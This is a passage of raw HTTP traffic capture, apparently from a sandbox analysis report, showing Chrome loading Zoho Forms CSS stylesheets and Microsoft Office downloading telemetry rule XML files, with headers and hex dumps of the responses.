                                                                                                                                                                                              ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                              x-ms-request-id: 561f43d7-f01e-0096-2f75-3b10ef000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202823Z-178bfbc474bq2pr7hC1NYCkfgg00000000p000000000dn83
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:23 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              53192.168.2.549779199.67.80.864431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:22 UTC595OUTGET /forms/css/themes/media.543197f4ae298f5ded2ac62e00a66656.css HTTP/1.1
                                                                                                                                                                                              Host: static.zohocdn.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://forms.zohopublic.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:23 UTC844INHTTP/1.1 200
                                                                                                                                                                                              Server: ZGS
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Content-Type: text/css;charset=UTF-8
                                                                                                                                                                                              Content-Length: 58687
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: zalb_a944c53744=08c8f5ff8608e249d7426e7dcbd5610c; Path=/; Secure; HttpOnly
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                              ETag: "6ace42d5a7bf452614b8ad7772073ac0"
                                                                                                                                                                                              Content-Language: en-US
                                                                                                                                                                                              Last-Modified: Fri, 01 Nov 2024 07:26:37 GMT
                                                                                                                                                                                              Access-Control-Expose-Headers: *
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              strict-transport-security: max-age=15768000
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              x-cache: MISS
                                                                                                                                                                                              nb-request-id: ee9d90d25b9383af38809c755877f417
                                                                                                                                                                                              z-origin-id: sa1-caef8add5c1f4f618129fb4a60aecb33
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Strict-Transport-Security: max-age=64072000; includeSubDomains; preload
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:23 UTC3252INData Raw: 2f 2a 20 24 49 64 3a 20 24 20 2a 2f 0a 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 2f 2a 20 43 53 53 20 44 6f 63 75 6d 65 6e 74 20 2a 2f 0a 0a 2f 2a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 52 45 53 50 4f 4e 53 49 56 45 20 4c 41 59 4f 55 54 53 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 2a 2f 0a 40 2d 77 65 62 6b 69 74 2d 76 69 65 77 70 6f 72 74 20 7b 0a 77 69 64 74 68 3a 64 65 76 69 63 65 2d 77 69 64 74 68 0a 7d 0a 40 2d 6d 6f 7a 2d 76 69 65 77 70 6f 72 74 20 7b 0a 77 69 64 74 68 3a 64 65 76 69 63 65 2d 77 69 64 74 68 0a 7d 0a 40 2d 6d 73 2d 76 69 65 77 70 6f 72 74 20 7b 0a 77 69 64 74 68
                                                                                                                                                                                              Data Ascii: /* $Id: $ */@charset "UTF-8";/* CSS Document *//*==================================RESPONSIVE LAYOUTS===============================================*/@-webkit-viewport {width:device-width}@-moz-viewport {width:device-width}@-ms-viewport {width
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 7b 20 77 69 64 74 68 3a 69 6e 68 65 72 69 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 0a 09 2e 73 75 62 46 6f 72 6d 48 6f 72 69 7a 6f 6e 74 61 6c 20 2e 64 61 74 65 20 2e 74 65 6d 70 43 6f 6e 74 44 69 76 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 7b 20 77 69 64 74 68 3a 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 09 0a 09 2e 73 75 62 66 72 6d 57 72 61 70 70 65 72 2d 68 6f 72 69 7a 6f 6e 74 61 6c 20 75 6c 2e 66 69 6c 65 55 70 6c 6f 64 42 64 72 62 6f 74 7b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 3b 7d 0a 09 2e 73 75 62 66 72 6d 41 64 64 5f 65 6e 74 72 79 44 69 76 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 39 66 39 66 39 3b 7d 0a
                                                                                                                                                                                              Data Ascii: t[type="text"]{ width:inherit !important;}.subFormHorizontal .date .tempContDiv input[type="text"]{ width:100% !important;}.subfrmWrapper-horizontal ul.fileUplodBdrbot{ margin-bottom:0; padding-bottom:0;}.subfrmAdd_entryDiv{ background:#f9f9f9;}
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 65 73 6d 61 6c 6c 2e 7a 66 53 65 6c 65 63 74 32 43 75 73 74 6f 6d 43 6f 6e 74 20 2e 73 65 6c 65 63 74 32 46 6f 72 6d 46 6f 6e 74 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 39 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 2e 6c 65 66 74 41 6c 69 67 6e 20 2e 6e 61 6d 65 2e 6e 61 6d 65 73 6d 61 6c 6c 2e 7a 66 53 65 6c 65 63 74 32 43 75 73 74 6f 6d 43 6f 6e 74 20 2e 73 65 6c 65 63 74 32 46 6f 72 6d 46 6f 6e 74 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 36 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 20 2e 6e 61 6d 65 6d 65 64 69 75 6d 2e 7a 66 53 65 6c 65 63 74 32 43 75 73 74 6f 6d 43 6f 6e 74 20 2e 74 68 72 65 65 54 79 70 65 20 2e 73 65 6c 65 63 74 32 46 6f 72 6d 46 6f 6e 74 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 70 78 20 21 69 6d 70
                                                                                                                                                                                              Data Ascii: esmall.zfSelect2CustomCont .select2FormFont { width: 95px !important;}.leftAlign .name.namesmall.zfSelect2CustomCont .select2FormFont { width: 65px !important;} .namemedium.zfSelect2CustomCont .threeType .select2FormFont { width: 25px !imp
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 69 64 74 68 3a 20 31 30 30 25 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 20 66 6c 6f 61 74 3a 20 6e 6f 6e 65 3b 7d 0a 2e 6c 65 66 74 41 6c 69 67 6e 20 2e 6e 61 6d 65 6d 65 64 69 75 6d 20 2e 74 77 6f 54 79 70 65 20 2e 73 61 6c 75 74 61 74 69 6f 6e 57 72 61 70 70 65 72 20 2e 73 61 6c 75 74 61 74 69 6f 6e 2c 20 2e 72 69 67 68 74 41 6c 69 67 6e 20 2e 6e 61 6d 65 6d 65 64 69 75 6d 20 2e 74 77 6f 54 79 70 65 20 2e 73 61 6c 75 74 61 74 69 6f 6e 57 72 61 70 70 65 72 20 2e 73 61 6c 75 74 61 74 69 6f 6e 7b 77 69 64 74 68 3a 35 30 25 3b 7d 0a 2e 6c 65 66 74 41 6c 69 67 6e 20 2e 6e 61 6d 65 6d 65 64 69 75 6d 20 2e 74 68 72 65 65 54 79 70 65 20 2e 73 61 6c 75 74 61 74 69 6f 6e 57 72 61 70 70 65 72 20 73 70 61 6e 2c 20 2e 72 69 67 68 74 41 6c 69 67 6e 20 2e 6e 61 6d
                                                                                                                                                                                              Data Ascii: idth: 100%;margin-left:0; float: none;}.leftAlign .namemedium .twoType .salutationWrapper .salutation, .rightAlign .namemedium .twoType .salutationWrapper .salutation{width:50%;}.leftAlign .namemedium .threeType .salutationWrapper span, .rightAlign .nam
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 74 69 6f 6e 57 72 61 70 70 65 72 20 2e 73 61 6c 75 74 61 74 69 6f 6e 2c 20 2e 72 69 67 68 74 41 6c 69 67 6e 20 2e 6e 61 6d 65 73 6d 61 6c 6c 20 2e 6f 6e 65 54 79 70 65 20 2e 73 61 6c 75 74 61 74 69 6f 6e 57 72 61 70 70 65 72 20 2e 73 61 6c 75 74 61 74 69 6f 6e 7b 77 69 64 74 68 3a 35 30 25 3b 7d 0a 2e 6c 65 66 74 41 6c 69 67 6e 20 2e 6e 61 6d 65 73 6d 61 6c 6c 20 2e 74 77 6f 54 79 70 65 20 2e 73 61 6c 75 74 61 74 69 6f 6e 57 72 61 70 70 65 72 20 73 70 61 6e 2c 20 2e 72 69 67 68 74 41 6c 69 67 6e 20 2e 6e 61 6d 65 73 6d 61 6c 6c 20 2e 74 77 6f 54 79 70 65 20 2e 73 61 6c 75 74 61 74 69 6f 6e 57 72 61 70 70 65 72 20 73 70 61 6e 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 20 66 6c 6f 61 74 3a 20 6e 6f 6e 65 3b 7d 0a 2e 6c
                                                                                                                                                                                              Data Ascii: tionWrapper .salutation, .rightAlign .namesmall .oneType .salutationWrapper .salutation{width:50%;}.leftAlign .namesmall .twoType .salutationWrapper span, .rightAlign .namesmall .twoType .salutationWrapper span{width: 100%;margin-left:0; float: none;}.l
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 7b 0a 09 09 77 69 64 74 68 3a 20 37 39 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 2e 74 6f 70 41 6c 69 67 6e 20 2e 7a 66 53 65 6c 65 63 74 32 43 75 73 74 6f 6d 43 6f 6e 74 2e 6e 61 6d 65 6c 61 72 67 65 20 2e 74 68 72 65 65 54 79 70 65 20 2e 73 61 6c 75 74 61 74 69 6f 6e 57 72 61 70 70 65 72 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 5f 5f 72 65 6e 64 65 72 65 64 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 7d 0a 2e 74 6f 70 41 6c 69 67 6e 20 2e 7a 66 53 65 6c 65 63 74 32 43 75 73 74 6f 6d 43 6f 6e 74 2e 6e 61 6d 65 6c 61 72 67 65 20 2e 74 68 72 65 65 54 79 70 65 20 2e 73 61 6c 75 74 61 74 69 6f 6e 57 72 61 70 70 65 72 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73
                                                                                                                                                                                              Data Ascii: {width: 79% !important;}.topAlign .zfSelect2CustomCont.namelarge .threeType .salutationWrapper .select2-container .select2-selection__rendered{width: 100%;}.topAlign .zfSelect2CustomCont.namelarge .threeType .salutationWrapper .select2-container .s
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 65 20 2e 73 61 6c 75 74 61 74 69 6f 6e 57 72 61 70 70 65 72 20 2e 73 61 6c 75 74 61 74 69 6f 6e 7b 77 69 64 74 68 3a 35 30 25 3b 7d 20 0a 20 20 20 20 0a 2e 74 6f 70 41 6c 69 67 6e 20 2e 6e 61 6d 65 6d 65 64 69 75 6d 20 2e 6f 6e 65 54 79 70 65 20 2e 73 61 6c 75 74 61 74 69 6f 6e 57 72 61 70 70 65 72 20 73 70 61 6e 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 20 66 6c 6f 61 74 3a 20 6e 6f 6e 65 3b 7d 0a 2e 74 6f 70 41 6c 69 67 6e 20 2e 6e 61 6d 65 6d 65 64 69 75 6d 20 2e 6f 6e 65 54 79 70 65 20 2e 73 61 6c 75 74 61 74 69 6f 6e 57 72 61 70 70 65 72 20 2e 73 61 6c 75 74 61 74 69 6f 6e 7b 77 69 64 74 68 3a 35 30 25 3b 7d 20 20 20 20 0a 2e 74 6f 70 41 6c 69 67 6e 20 2e 6e 61 6d 65 6d 65 64 69 75 6d 20 2e 74 77 6f 54 79 70 65
                                                                                                                                                                                              Data Ascii: e .salutationWrapper .salutation{width:50%;} .topAlign .namemedium .oneType .salutationWrapper span{width: 100%;margin-left:0; float: none;}.topAlign .namemedium .oneType .salutationWrapper .salutation{width:50%;} .topAlign .namemedium .twoType
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 63 65 57 72 61 70 70 65 72 7b 20 77 69 64 74 68 3a 31 30 30 25 3b 7d 0a 0a 2e 6c 65 66 74 41 6c 69 67 6e 20 2e 6f 6e 65 43 6f 6c 75 6d 6e 73 20 2e 69 6d 67 55 70 6c 6f 61 64 54 79 70 65 20 2e 69 6d 67 43 68 6f 69 63 65 57 72 61 70 70 65 72 2c 20 2e 72 69 67 68 74 41 6c 69 67 6e 20 2e 6f 6e 65 43 6f 6c 75 6d 6e 73 20 2e 69 6d 67 55 70 6c 6f 61 64 54 79 70 65 20 2e 69 6d 67 43 68 6f 69 63 65 57 72 61 70 70 65 72 7b 20 77 69 64 74 68 3a 31 30 30 25 3b 7d 0a 0a 2e 6c 65 66 74 41 6c 69 67 6e 20 2e 74 77 6f 43 6f 6c 75 6d 6e 73 20 2e 69 6d 67 55 70 6c 6f 61 64 54 79 70 65 20 2e 69 6d 67 43 68 6f 69 63 65 57 72 61 70 70 65 72 2c 20 2e 72 69 67 68 74 41 6c 69 67 6e 20 2e 74 77 6f 43 6f 6c 75 6d 6e 73 20 2e 69 6d 67 55 70 6c 6f 61 64 54 79 70 65 20 2e 69 6d 67 43
                                                                                                                                                                                              Data Ascii: ceWrapper{ width:100%;}.leftAlign .oneColumns .imgUploadType .imgChoiceWrapper, .rightAlign .oneColumns .imgUploadType .imgChoiceWrapper{ width:100%;}.leftAlign .twoColumns .imgUploadType .imgChoiceWrapper, .rightAlign .twoColumns .imgUploadType .imgC
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 69 6f 6e 57 72 61 70 70 65 72 20 2e 73 61 6c 75 74 61 74 69 6f 6e 2c 20 2e 72 69 67 68 74 41 6c 69 67 6e 20 2e 6e 61 6d 65 6d 65 64 69 75 6d 20 2e 6f 6e 65 54 79 70 65 20 2e 73 61 6c 75 74 61 74 69 6f 6e 57 72 61 70 70 65 72 20 2e 73 61 6c 75 74 61 74 69 6f 6e 7b 77 69 64 74 68 3a 35 30 25 3b 7d 20 20 20 20 20 0a 2e 6c 65 66 74 41 6c 69 67 6e 20 2e 6e 61 6d 65 6d 65 64 69 75 6d 20 2e 74 77 6f 54 79 70 65 20 2e 73 61 6c 75 74 61 74 69 6f 6e 57 72 61 70 70 65 72 20 73 70 61 6e 2c 20 2e 72 69 67 68 74 41 6c 69 67 6e 20 2e 6e 61 6d 65 6d 65 64 69 75 6d 20 2e 74 77 6f 54 79 70 65 20 2e 73 61 6c 75 74 61 74 69 6f 6e 57 72 61 70 70 65 72 20 73 70 61 6e 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 20 66 6c 6f 61 74 3a 20 6e 6f
                                                                                                                                                                                              Data Ascii: ionWrapper .salutation, .rightAlign .namemedium .oneType .salutationWrapper .salutation{width:50%;} .leftAlign .namemedium .twoType .salutationWrapper span, .rightAlign .namemedium .twoType .salutationWrapper span{width: 100%;margin-left:0; float: no
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 74 6f 6d 43 6f 6e 74 20 2e 74 68 72 65 65 54 79 70 65 20 2e 73 65 6c 65 63 74 32 46 6f 72 6d 46 6f 6e 74 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 34 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 2e 74 65 6d 70 53 75 62 66 72 6d 57 72 61 70 70 65 72 20 2e 6e 61 6d 65 6d 65 64 69 75 6d 2e 7a 66 53 75 62 66 6f 72 6d 53 65 6c 65 63 74 32 20 2e 74 68 72 65 65 54 79 70 65 20 2e 73 65 6c 65 63 74 32 46 6f 72 6d 46 6f 6e 74 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 34 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 20 2e 6e 61 6d 65 2e 6e 61 6d 65 73 6d 61 6c 6c 2e 7a 66 53 65 6c 65 63 74 32 43 75 73 74 6f 6d 43 6f 6e 74 20 2e 74 77 6f 54 79 70 65 20 2e 73 65 6c 65 63 74 32 46 6f 72 6d 46 6f 6e 74 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 70
                                                                                                                                                                                              Data Ascii: tomCont .threeType .select2FormFont { width: 40px !important;}.tempSubfrmWrapper .namemedium.zfSubformSelect2 .threeType .select2FormFont { width: 40px !important;} .name.namesmall.zfSelect2CustomCont .twoType .select2FormFont { width: 25p


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              54192.168.2.549777199.67.80.864431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:22 UTC607OUTGET /forms/css/themes/media/customMedia.bdbbc9b6f964ee4f4c1d1debd83b0068.css HTTP/1.1
                                                                                                                                                                                              Host: static.zohocdn.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://forms.zohopublic.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:23 UTC842INHTTP/1.1 200
                                                                                                                                                                                              Server: ZGS
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Content-Type: text/css;charset=UTF-8
                                                                                                                                                                                              Content-Length: 974
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: zalb_a944c53744=08c8f5ff8608e249d7426e7dcbd5610c; Path=/; Secure; HttpOnly
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                              ETag: "62da83a5cdfc0d4389217db9abfbcb57"
                                                                                                                                                                                              Content-Language: en-US
                                                                                                                                                                                              Last-Modified: Fri, 29 Mar 2024 09:59:39 GMT
                                                                                                                                                                                              Access-Control-Expose-Headers: *
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              strict-transport-security: max-age=15768000
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              x-cache: MISS
                                                                                                                                                                                              nb-request-id: 4b0eedf25f9d0a68de63555dede4623b
                                                                                                                                                                                              z-origin-id: sa1-a79631aa276d48ebb7b7edf85556182e
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Strict-Transport-Security: max-age=64072000; includeSubDomains; preload
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:23 UTC974INData Raw: 2f 2a 20 24 49 64 3a 20 24 20 2a 2f 0a 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 2f 2a 20 43 53 53 20 44 6f 63 75 6d 65 6e 74 20 2a 2f 0a 0a 0a 0a 2f 2a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 20 7b 0a 0a 09 2e 62 61 63 6b 67 72 6f 75 6e 64 53 65 63 42 67 20 7b 70 61 64 64 69 6e 67 3a 33 30 70 78 3b 7d 0a 0a 7d 0a 0a 0a 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 36 38 70 78 29 20 7b 0a 0a 09 2e 62 61 63 6b 67 72 6f 75 6e 64 53 65 63 42 67 20 7b 70 61 64 64 69 6e 67 3a 33 30 70 78 3b 7d 0a 0a 7d 0a 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74
                                                                                                                                                                                              Data Ascii: /* $Id: $ */@charset "UTF-8";/* CSS Document *//*@media only screen and (min-width:1024px) {.backgroundSecBg {padding:30px;}}@media only screen and (max-width:768px) {.backgroundSecBg {padding:30px;}}@media only screen and (min-widt


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              55192.168.2.54977513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:23 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                              x-ms-request-id: bdf962e5-c01e-0066-1b8c-3aa1ec000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202823Z-r1d97b9957747b9jhC1TEBgyec00000009hg000000004482
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:23 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              56192.168.2.54977413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:23 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB344914B"
                                                                                                                                                                                              x-ms-request-id: eb1ded04-b01e-0097-298c-3a4f33000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202823Z-1777c6cb754lv4cqhC1TEB13us0000000a3000000000b84u
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
